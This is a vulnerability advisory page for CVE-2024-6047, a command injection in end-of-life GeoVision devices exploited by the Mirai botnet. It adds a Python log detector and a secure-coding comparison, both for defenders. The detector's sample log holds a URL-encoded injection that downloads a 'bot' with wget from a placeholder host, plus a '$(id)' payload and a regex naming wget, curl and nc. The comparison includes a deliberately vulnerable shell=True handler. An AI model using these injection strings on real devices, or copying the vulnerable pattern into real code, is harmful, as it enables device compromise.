CVE-2024-6047
Published: 17 June 2024
Summary
CVE-2024-6047 is a critical-severity OS Command Injection (CWE-78) vulnerability in GeoVision Gvlx 4. Its CVSS base score is 9.8 (Critical).
Operationally, it ranks in the top 1.2% of CVEs by exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SA-22 (Unsupported System Components) and SI-10 (Information Input Validation).
Deeper analysis
Certain EOL GeoVision devices are affected by an OS command injection vulnerability (CWE-78) because they fail to properly filter user input for specific functionality. The flaw carries a CVSS score of 9.8 and permits unauthenticated remote code execution with full system impact.
Unauthenticated remote attackers can exploit the issue over the network to inject and execute arbitrary system commands on the device without requiring credentials or user interaction.
TW-CERT advisories cover the vulnerability in the referenced publications, and an Akamai report documents active exploitation of the affected GeoVision devices by the Mirai IoT botnet. The associated EPSS score has remained high, with a current value of 0.7297 and a peak of 0.7335.
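Because the advisory reports in-the-wild exploitation, a defender's first question is how to spot attempts against an EOL device that cannot be patched. The script below is an added example, not part of this advisory or of Akamai's report: it parses constructed Common Log Format lines (the source addresses, timestamps and the `/cgi-bin/example` endpoint are placeholders, not the real vulnerable path) and flags any request whose query parameter values contain shell metacharacters after URL decoding. The heuristic is a generic CWE-78 indicator for a reverse proxy or syslog collector in front of the device, not a signature for CVE-2024-6047 itself.

```python
"""Flag HTTP requests whose query-parameter values look like OS command injection.

Added example; not from the advisory or from Akamai's report. The log lines are
constructed, the endpoint path is a placeholder, and the metacharacter check is a
generic CWE-78 indicator rather than a CVE-2024-6047 signature.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Common Log Format lines (not real traffic). 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges used here as placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [07/May/2025:10:12:01 +0000] "GET /cgi-bin/example?target=192.168.1.20 HTTP/1.1" 200 312
203.0.113.9 - - [07/May/2025:10:12:07 +0000] "GET /cgi-bin/example?target=192.168.1.20%3B%20wget%20http%3A%2F%2F198.51.100.7%2Fbot%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 312
10.0.0.6 - - [07/May/2025:10:13:44 +0000] "POST /login HTTP/1.1" 302 0
203.0.113.9 - - [07/May/2025:10:14:02 +0000] "GET /cgi-bin/example?target=%24(id) HTTP/1.1" 500 0
"""

# One CLF line: source, ident, user, timestamp, request line, status, size.
_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Shell metacharacters that let a concatenated value break out of the intended
# command, plus a few download/exec utilities that rarely belong in a parameter.
_SHELL_META = re.compile(r"[;|&`$]|\b(?:wget|curl|sh|nc|tftp)\b")


def suspicious_params(url: str) -> list[tuple[str, str]]:
    """Return (name, decoded value) pairs whose value contains shell metacharacters.

    parse_qsl() already URL-decodes values, so '%3B' is inspected as ';'.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if _SHELL_META.search(value):
            hits.append((name, value))
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each CLF line and emit an alert record for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = _LINE.match(line)
        if not match:
            continue  # unparseable line; a real pipeline would count these
        hits = suspicious_params(match["url"])
        if hits:
            alerts.append({
                "src": match["src"],
                "ts": match["ts"],
                "status": int(match["status"]),
                "url": match["url"],
                "params": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']} -> {alert['params']}")
```

The alert record keeps the HTTP status because a 200 on an injected request is a stronger signal than a 500: it suggests the handler accepted the value rather than rejecting it. Treat the output as a triage queue, not a verdict; legitimate parameters can contain `&` or `$`, so tune the character set per endpoint.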
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-47205
Vulnerability details
Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.
- CWE(s): CWE-78 (OS Command Injection)
- KEV Date Added: 07 May 2025
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly requires validation and sanitization of untrusted input, which would block the unsanitized user input that enables the OS command injection.
- SA-22 (Unsupported System Components): mandates controls for unsupported/EOL components (replacement, isolation, or additional protections), precisely because these GeoVision devices receive no patches.
- Access enforcement: enforces access-control decisions so that unauthenticated remote actors cannot reach the vulnerable command-execution functionality.
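To make the SI-10 and access-enforcement points concrete, here is an added example that is not GeoVision code: a diagnostic handler written the way the advisory describes the flaw (untrusted input concatenated into a shell command) next to a hardened version that requires authentication, accepts only an allowlisted IPv4 literal, and passes the value as a single argv element with no shell. The endpoint, the `target` parameter and the use of a `ping`-style diagnostic are assumptions; `echo` stands in for the real diagnostic so the example runs offline.

```python
"""CWE-78 in a device diagnostic handler: vulnerable pattern and hardened form.

Added example; not GeoVision code. The `target` parameter and the ping-style
diagnostic are assumptions. `echo` replaces the real command so it runs offline.
"""
import re
import subprocess

# Allowlist: a syntactically valid IPv4 dotted quad and nothing else.
# Hostnames, whitespace and every shell metacharacter fail this check.
_IPV4 = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)


def validate_ipv4(value: str) -> bool:
    """SI-10 style input validation: True only for an IPv4 literal."""
    return _IPV4.fullmatch(value) is not None


def build_command_vulnerable(target: str) -> str:
    """The CWE-78 pattern: the untrusted value is spliced into a shell string."""
    return "echo pinging " + target  # think 'ping -c 1 ' + target on the device


def run_vulnerable(target: str) -> str:
    """No authentication, no validation, and shell=True: ';', '|', '$(...)'
    inside `target` are parsed by the shell and executed as extra commands."""
    result = subprocess.run(
        build_command_vulnerable(target), shell=True, capture_output=True, text=True
    )
    return result.stdout


def run_hardened(target: str, authenticated: bool) -> str:
    """Access enforcement first, then allowlist validation, then an argv list.

    With shell=False the value reaches the program as one argument and is never
    interpreted by a shell, so even a value that slipped past validation could
    not spawn a second command.
    """
    if not authenticated:
        raise PermissionError("authentication required for diagnostics")
    if not validate_ipv4(target):
        raise ValueError(f"rejected diagnostic target: {target!r}")
    result = subprocess.run(
        ["echo", "pinging", target], shell=False, capture_output=True, text=True
    )
    return result.stdout


def hardened_rejects(target: str) -> bool:
    """Helper for checks: True if the hardened path refuses `target`."""
    try:
        run_hardened(target, authenticated=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    injected = "192.168.1.10; echo INJECTED"
    print("vulnerable:", repr(run_vulnerable(injected)))        # second command runs
    print("hardened rejects:", hardened_rejects(injected))       # True
    print("hardened:", repr(run_hardened("192.168.1.10", True)))
```

Validation and the argv list are independent layers: the allowlist is the SI-10 control, while `shell=False` removes the shell parser that gives metacharacters their meaning. On an EOL device that cannot take this code change, the equivalent of the first check is the SA-22 guidance above: put the management interface behind an authenticating proxy or off the reachable network entirely.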